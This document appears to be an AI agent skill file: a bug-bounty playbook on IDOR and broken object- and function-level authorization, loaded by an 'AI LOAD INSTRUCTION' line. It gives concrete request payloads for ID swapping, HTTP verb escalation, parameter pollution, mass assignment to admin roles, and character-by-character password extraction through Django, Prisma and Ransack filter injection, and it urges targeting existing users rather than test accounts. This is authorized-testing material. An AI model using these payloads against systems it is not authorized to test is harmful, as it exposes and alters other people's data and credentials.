SKILL: IDOR / Broken Object Level Authorization — Expert Attack Playbook

AI LOAD INSTRUCTION: IDOR is the #1 bug bounty finding. This skill covers non-obvious IDOR surfaces, all attack vectors (not just URL params), A-B testing methodology, BOLA vs BFLA distinction, chaining IDOR to higher impact, and what testers repeatedly miss.

1. IDOR vs BOLA vs BFLA

Term	Meaning	Impact
IDOR	Insecure Direct Object Reference	Read/modify other users' data
BOLA	Broken Object Level Authorization (OWASP API Top 10 A1)	Same as IDOR, API terminology
BFLA	Broken Function Level Authorization	Low-priv user accesses HIGH-PRIV functions (e.g., admin endpoints)

Key distinction:

BOLA = accessing object you shouldn't own (data belonging to other users)
BFLA = accessing function you shouldn't be authorized for (admin CRUD operations, bulk actions, user management)

2. WHERE TO FIND OBJECT IDs (ALL LOCATIONS)

Don't stop at URL path parameters — IDs appear in:

URL path:        GET /api/v1/users/1234/profile
URL query:       GET /orders?order_id=982
Request body:    {"userId": 1234, "action": "view"}
JSON fields:     {"resource": {"id": 5678, "type": "invoice"}}
Headers:         X-User-ID: 1234
                 X-Account-ID: 9999
Cookies:         user_id=1234; account=org_5678
GraphQL args:    query { user(id: "1234") { ... } }
Form fields:     <input name="documentId" value="5678">
WebSocket msgs:  {"event":"subscribe","channel_id":9999}

3. A-B TESTING METHODOLOGY

The most systematic IDOR test approach:

Step 1: Create two test accounts: UserA and UserB
Step 2: Perform all actions as UserA, capture all requests
        (profile edit, order view, password change, file access, etc.)
Step 3: Note every object ID created or accessed by UserA
Step 4: Authenticate as UserB
Step 5: Replay UserA's requests using UserB's session token
Step 6: If UserB can read/modify UserA's data → BOLA confirmed

Victim matters: for real bugs, target existing users, not test accounts.
Report evidence: show UserA owns the resource, UserB accessed it.

4. ID TYPE ITS IMPLICATIONS

ID Pattern	Example	Notes
Sequential int	`id=1001` → `id=1002`	Easy prediction, high hit rate
UUID v4	`550e8400-...`	Need to find UUID from other endpoints
UUID v1	Clock-based UUID	Time-predictable! Extract timestamp/MAC
GUIDs from own data	See in responses	Collect all UUIDs from your own account data first
Hashed IDs	`md5(user_id)`	Try hashing sequential ints
Encoded IDs	base64( `{"id":1001}` )	Decode → modify → re-encode
Compound IDs	`/api/users/1/orders/5`	Both IDs may be independently verifiable

5. HORIZONTAL vs VERTICAL PRIVILEGE ESCALATION

Horizontal: UserA accesses UserB's data (same privilege level)

GET /api/account/1234/statement     ← you are user 5678

Vertical: Low-priv user accesses admin-only functions

POST /api/admin/users/delete        ← normal user calling admin endpoint
GET /api/admin/all-users
PUT /api/users/1234/role {"role":"admin"}

Combined: Low-priv IDOR that grants privilege escalation

GET /api/v1/users/1/details → read admin user's auth token

6. HTTP METHOD ESCALATION

When

GET /resource/1234

is properly restricted, test ALL other verbs:

http

GET    /api/v1/users/UserA_ID    ← might be blocked
POST   /api/v1/users/UserA_ID    ← different code path, might not check authz
PUT    /api/v1/users/UserA_ID    ← update another user's data
DELETE /api/v1/users/UserA_ID    ← delete another user's account
PATCH  /api/v1/users/UserA_ID    ← partial update (often missed in authz checks)

Why this works: Authorization logic is often implemented per-method, and developers forget edge cases.

7. PARAMETER POLLUTION & TYPE CONFUSION

When

id=1234

is validated, try:

id[]=1234&id[]=5678          ← array — app may use first or last
id=5678&id=1234              ← duplicate — app may prefer first or last
{"id": "1234"}               ← string vs int: might hit different code path
{"id": [1234]}               ← array in JSON
{"userId": 1234, "id": 5678} ← two ID fields — which is used for authz?

JSON Type Confusion:

json

{"userId": "1234"}   vs   {"userId": 1234}

Some ORMs handle string vs integer differently in queries.

8. BFLA (FUNCTION LEVEL) ATTACKS

Common BFLA Endpoints to Test

http

# User management (admin-only in design):
GET /api/v1/admin/users
DELETE /api/v1/users/{any_user_id}
PUT /api/v1/users/{user_id}/role

# Bulk operations:
POST /api/v1/users/bulk-delete
GET /api/v1/export/all-data

# Billing/payment admin:
POST /api/v1/admin/subscription/modify
GET /api/v1/admin/payments/all

# Internal reporting:
GET /api/v1/reports/all-users-activity

How to Find Hidden Admin Endpoints

Read JS bundles — admin routes often exposed in frontend code
Look at API docs (Swagger/OpenAPI) for "admin", "internal", "privileged" tags

Enumerate

/api/v1/admin/**

/api/v1/manage/**

/api/v1/internal/**

Burp "Discover Content" on API base path
Compare regular user docs vs admin section docs if available

9. INDIRECT IDOR (REFERENCE CHAIN)

App checks permission on object A but doesn't check ownership of referenced object B:

Example:

UserA has permission to read their own messages.
GET /api/messages/1234 → checks: "does user own message 1234?" ✓

But: messages have attachments.
GET /api/attachments/5678 → doesn't check: "does attachment belong to message owned by user?"

Test: access attachments/sub-resources directly via their IDs without going through parent endpoint.

GraphQL variant: Inline querying related objects without separate authorization:

graphql

query {
  myProfile {
    followers {
      privateEmail    ← accessing private field of OTHER users via relationship
    }
  }
}

10. MASS ASSIGNMENT → PRIVILEGE ESCALATION

When POST/PUT takes a JSON body, properties in the underlying model may be settable even if not in the official API docs:

json

POST /api/v1/register
{
  "username": "attacker",
  "email": "a@evil.com",
  "password": "password",
  "role": "admin",          ← hidden field
  "isAdmin": true,          ← hidden field
  "verified": true,         ← skip email verification
  "creditBalance": 9999     ← give self credits
}

How to find hidden fields:

Intercept admin "create user" vs normal "register" — diff the fields
Read API documentation for all possible fields
Check source code if available (GitHub, JS bundles)
Fuzz with Burp: add common property names and check for
```
200
```
vs
```
400
```

11. STATE MACHINE ABUSE (BUSINESS LOGIC IDOR)

When resources have a status/state:

order.status: pending → confirmed → shipped → delivered

Test: Can you skip states?

PUT /api/orders/1234 {"status": "delivered"}  ← from "pending"
PUT /api/orders/1234 {"status": "refunded"}   ← from "pending" (skip shipped)

Can you set another user's order status?

PUT /api/orders/UserA_order_id {"status": "cancelled"}  ← as UserB

12. QUICK IDOR CHECKLIST

□ Create 2 accounts (UserA + UserB)
□ Map all API calls that contain object IDs (Burp History export filter)
□ Test all HTTP verbs on each endpoint
□ Test ID in all locations: path, body, header, query, cookie
□ Try sequential IDs (−1, +1 from your own)
□ Try UUIDs/GUIDs collected from your own account data
□ Test sub-resources (attachments, comments, transactions)
□ Test admin endpoints directly (BFLA)
□ Test POST/PUT body for extra fields (mass assignment)
□ Compare JSON response field count vs documented fields (hidden fields)
□ Test state/status field modification

13. SYSTEMATIC IDOR TESTING — 8 CATEGORIES

#	Category	Test Method
1	Direct ID reference	Change numeric/UUID ID in URL: `/api/users/123` → `/api/users/124`
2	Predictable UUID	If UUIDs are v1 (time-based), adjacent IDs are calculable
3	Batch/bulk operations	`/api/users/bulk?ids=123,456` — add other users' IDs
4	Export/download	Export endpoint leaks other users' data: `/export?user_id=*`
5	Linked object IDOR	Change `order.address_id` to another user's address
6	Resource replacement	Update own profile with another user's resource ID → overwrites
7	Write IDOR	PUT/PATCH/DELETE with other user's ID — modify/delete their data
8	Nested object	`/api/orgs/1/users/2` — change org ID to access other org's users

Testing Flow

1. Create two test accounts (A and B)
2. Perform all CRUD operations as A, capture all request IDs
3. Replay each request replacing A's IDs with B's IDs
4. Check: Can A read B's data? Modify? Delete?
5. Test with: numeric IDs, UUIDs, slugs, encoded values
6. Test across: URL path, query params, JSON body, headers

14. ORM FILTER CHAIN LEAKS

Django ORM Filter Injection

python

# Vulnerable: User.objects.filter(**request.data)
# Attacker sends: {"password__startswith": "a"}
# Django translates to: WHERE password LIKE 'a%'

# Character-by-character extraction:
POST /api/users/
{"username": "admin", "password__startswith": "a"}   → 200 (match)
{"username": "admin", "password__startswith": "b"}   → 404 (no match)
# Iterate through charset for each position

# Relational traversal:
{"author__user__password__startswith": "a"}
# Traverses: Author → User → password field

# On MySQL: ReDoS via regex
{"email__regex": "^(a+)+$"}  → CPU spike if match exists

Prisma Filter Injection

json

// Vulnerable: prisma.user.findMany({ where: req.body })
// Attacker sends nested include/select:
{
  "include": {
    "posts": {
      "include": {
        "author": {
          "select": {"password": true}
        }
      }
    }
  }
}
// Leaks password field through relation traversal

Ransack (Ruby on Rails)

# Ransack allows search predicates via query params:
GET /users?q[password_cont]=admin
# Searches: WHERE password LIKE '%admin%'

# Character extraction:
GET /users?q[password_start]=a   → count results
GET /users?q[password_start]=ab  → narrow down
# Tool: plormber (automated Ransack extraction)

idor-broken-object-authorization

NPX Install

Tags

SKILL.md Content

SKILL: IDOR / Broken Object Level Authorization — Expert Attack Playbook

1. IDOR vs BOLA vs BFLA

2. WHERE TO FIND OBJECT IDs (ALL LOCATIONS)

3. A-B TESTING METHODOLOGY

4. ID TYPE ITS IMPLICATIONS

5. HORIZONTAL vs VERTICAL PRIVILEGE ESCALATION

6. HTTP METHOD ESCALATION

7. PARAMETER POLLUTION & TYPE CONFUSION

8. BFLA (FUNCTION LEVEL) ATTACKS

Common BFLA Endpoints to Test

How to Find Hidden Admin Endpoints

9. INDIRECT IDOR (REFERENCE CHAIN)

10. MASS ASSIGNMENT → PRIVILEGE ESCALATION

11. STATE MACHINE ABUSE (BUSINESS LOGIC IDOR)

12. QUICK IDOR CHECKLIST

13. SYSTEMATIC IDOR TESTING — 8 CATEGORIES

Testing Flow

14. ORM FILTER CHAIN LEAKS

Django ORM Filter Injection

Prisma Filter Injection

Ransack (Ruby on Rails)